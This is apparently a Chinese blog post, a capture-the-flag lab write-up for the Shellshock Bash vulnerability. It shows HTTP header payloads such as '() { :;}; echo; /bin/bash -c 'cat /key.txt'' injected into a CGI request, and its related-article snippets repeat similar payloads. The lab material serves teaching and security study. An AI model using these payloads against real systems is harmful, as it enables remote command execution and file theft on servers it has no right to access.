Bash漏洞分析溯源

最新推荐文章于 2022-01-07 20:07:48 发布
最新推荐文章于 2022-01-07 20:07:48 发布
阅读量242 收藏
点赞数
文章标签: 墨者学院 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cc_de_csdn/article/details/100070928
版权

1.由题意得知需要找到poc.cgi文件,通过查询得知文件目录一般为/cgi-bin/poc.cgi
2.通过查询漏洞得知bash在处理() { :;};的环境变量赋值的代码上存在设计缺陷,会将函数定义后面的字符串作为命令执行,利用bash漏洞需要在闭合函数之后输出一个换行,可以使用echo;
3.使用brupsuite捕获/cgi-bin/poc.cgi的报文,发送到Repeater修改
4.将Connection:() { :;}; echo; /bin/bash -c 'cat /key.txt’添加到报文运行
5.得到KEY

cc_de_csdn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BASH漏洞检查
03-09
Linux中一个对计算机用户造成的威 胁“ Bash漏洞
bash 漏洞 linux
10-14
redhat 5和6的bash漏洞补丁 bash-3.2-33.el5_11.4.i386.rpm bash-3.2-33.el5_11.4.x86_64.rpm bash-4.1.2-15.el6_5.2.i686.rpm bash-4.1.2-15.el6_5.2.x86_64.rpm
检测cgi-bin漏洞存在方法
热门推荐
xiaoshan812613234的专栏
12-25 2万+
bash漏洞技术层面分析 漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulnerable' bash -c "echo this is a test", 如果在一个含有版本号小于bash 4.3的linux或者unix系统上执行以上命令,可能会得到以下输出: v
墨者 - Bash漏洞分析溯源
吃肉唐僧的博客
06-30 507
bash代码注入的安全漏洞分析 bash的环境变量 环境变量是操作系统运行shell中的变量,很多程序的运行需要获取系统的环境变量参数。具体赋值格式如下: $ var="hello world" 然后你就可以使用这个变量了,但是只是局部变量,即是当前进程可以用,若当前进程的子进程或者其他进程需要用,需要用到 export将本进程的变量copy到其他进程。丽日...
修复bash漏洞的shell脚本分享
09-04
主要介绍了修复bash漏洞的shell脚本分享,本文脚本适应常见的linux服务器系统,如CentOS、Debian、Ubuntu、OpenSuSE、Aliyun等系统,需要的朋友可以参考下
Linux Bash漏洞详细说明
10-09
Linux Bash漏洞,通常被称为"Shellshock",是2014年发现的一系列安全漏洞,影响了广泛使用的Bash shell。Bash是类Unix系统(包括Linux和Mac OS X)上的一个命令行解释器,它允许用户通过命令行界面执行系统级任务。...
CentOS bash漏洞修复
09-29
CentOS的bash漏洞修复安装包
0x2D.Bash漏洞分析溯源
qq_31679787的博客
11-01 198
Bash远程命令执行漏洞存在于网站的/cgi-bin/目录下; 抓包后在HTTP请求中插入pocpoc: User-Agent: () { :;}; echo; /bin/ls / 再构造poc能够查看key文件; 漏洞详情: https://www.freebuf.com/vuls/44994.html ...
[ 墨者学院 ] 命令执行——Bash漏洞分析溯源
weixin_30535913的博客
06-27 166
0x00.题目描述: 背景介绍 安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞。 实训目标 1、了解bash; 2、了解Bash远程命令执行漏洞形成原因; 3、了解Bash远程命令执行漏洞利用方法; 解题方向 找到poc.cgi文件 0x01.题目分析: 根据题目说明,在网上对Bash远程命令执行漏洞进行了一番学习。 参考连接...
在线靶场-墨者-命令执行2星-Bash漏洞分析溯源
weixin_42079912的博客
08-09 295
打开靶场网页。 根据解题方向:找到poc.cgi文件。查询资料的得知poc.cgi文件在/cgi-bin/路径下。 bash详细分析后得知bash在处理含有函数定义诸如”() { :;};”的环境变量赋值的代码上存在设计缺陷,错误地将函数定义后面的字符串作为命令执行。设法让系统接受一个含有"(函数定义)+(任意命令)“的环境变量赋值则可触发”(任意命令)"部分所表示的代码执行。 用() { :; ...
墨者Bash漏洞分析溯源题解
zr1213159840的博客
01-07 380
这个漏洞是看别人的思路解出来的,因为在打开页面后,我扫描不出来其他东西,惭愧 后台存在一个地址,是http://219.153.49.228:49581/cgi-bin/poc.cgi 访问这个地址 对着地址进行抓包 将user-agent进行修改,修改为() { :;}; echo; /bin/ls / 重放一下看下效果 能看到读取出了目录的内容,我们直接读取key.txt,将user-agent修改为:() { :;}; echo; /bin/cat /key.txt。拿到key ...
Bash漏洞那些事儿
ifeves的博客
09-27 221
还记得Heartbleed漏洞吗?如果你相信今天这个铺天盖地的传言,那说明Shellshock和它是一类的,它的名字也同样令人畏惧(弹震症,一种精神疾病),就是缺了个酷点...
Bash漏洞
joosonmao的专栏
09-29 2221
Bash漏洞为远程解析命令执行漏洞(CVE-2014-6271),可以直接在Bash支持的Web CGI环境下远程执行任何命令。这也就使得一些路由器、堡垒机、VPN等网络设备将会成为重灾区,另外各大Linux发行版和Mac OS X系统都受影响,甚至Android也会受到影响。  Bash漏洞将影响基于Unix平台的操作系统,包括Linux和Mac OS X。利用Bash漏洞的方法也更简单——只
Bash漏洞解析
FeelTouch Labs
09-26 2173
预备知识 Bash UNIX-like系统上的shell,可以让用户在UNIX-like系统输入并执行命令的一个解释器,一般通过ssh或telent实现连接,另外,在WEB服务器上也可以作为CGI脚本的解释器。UNIX-like系统上有多个shell,但它是默认的shell。 Bash漏洞 释义:Bash会对环境变量赋值中的函数定义后的字符串进行处理(言外之意,攻击者可以布局代
Bash 3.0-4.3命令执行漏洞分析
ytuo1223的专栏
09-07 747
POCBash Shell下执行以下代码: env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 如果输出: vulnerable this is a test 原理分析: Shell里可以定义变量,POC中定义了一个命名为x的变量,内容是一个字符串: () { :;}; echo vulne
【Web】内部文件上传系统漏洞分析溯源(获取shell)
HAPPY
07-29 3537
【准备工具】 1.中国菜刀 (可以去官网下载) 官网:http://www.maicaidao.co/ (不建议使用) https://download.csdn.net/download/u014549283/10570976 2.BurpPro 3.火狐浏览器的FoxyProxy Standard插件 【技术要点】 1.新建一句话代码,比如1.txt,内容选择如下 ...
禁止存在bash安全漏洞
最新发布
08-02
确保 Bash 安全的关键在于遵循一些基本的安全实践,包括但不限于: 1. **更新系统**:定期更新操作系统和 Bash 及其依赖的软件包,因为新版本通常包含了安全修复。 2. **限制权限**:给普通用户创建受限的 Bash shell环境,避免root权限的滥用。使用`su`或`sudo`谨慎地切换用户。 3. **禁用shell内置命令**:有些内置命令可能易受攻击,如 `set -o eval` 和 `source`,应谨慎使用或禁用它们。 4. **配置Bash**:启用严格的模式(`set -u`),防止未初始化变量使用;禁用历史记录存储密码(`HISTCONTROL`)。 5. **输入验证**:对用户输入进行校验和清理,避免命令注入攻击,可以使用`read -s` 或 `printf "%q\n"` 替代直接赋值。 6. **配置SSH**:只允许来自信任源的 SSH 连接,并启用密钥认证。 7. **防火墙规则**:配置防火墙阻止不必要的网络访问,特别是对Shell服务端口的连接。 8. **禁止外壳函数**:避免编写执行复杂操作的外壳函数,以免无意间引入风险。 9. **审计日志**:设置适当的审计策略,跟踪用户的活动以便发现异常行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值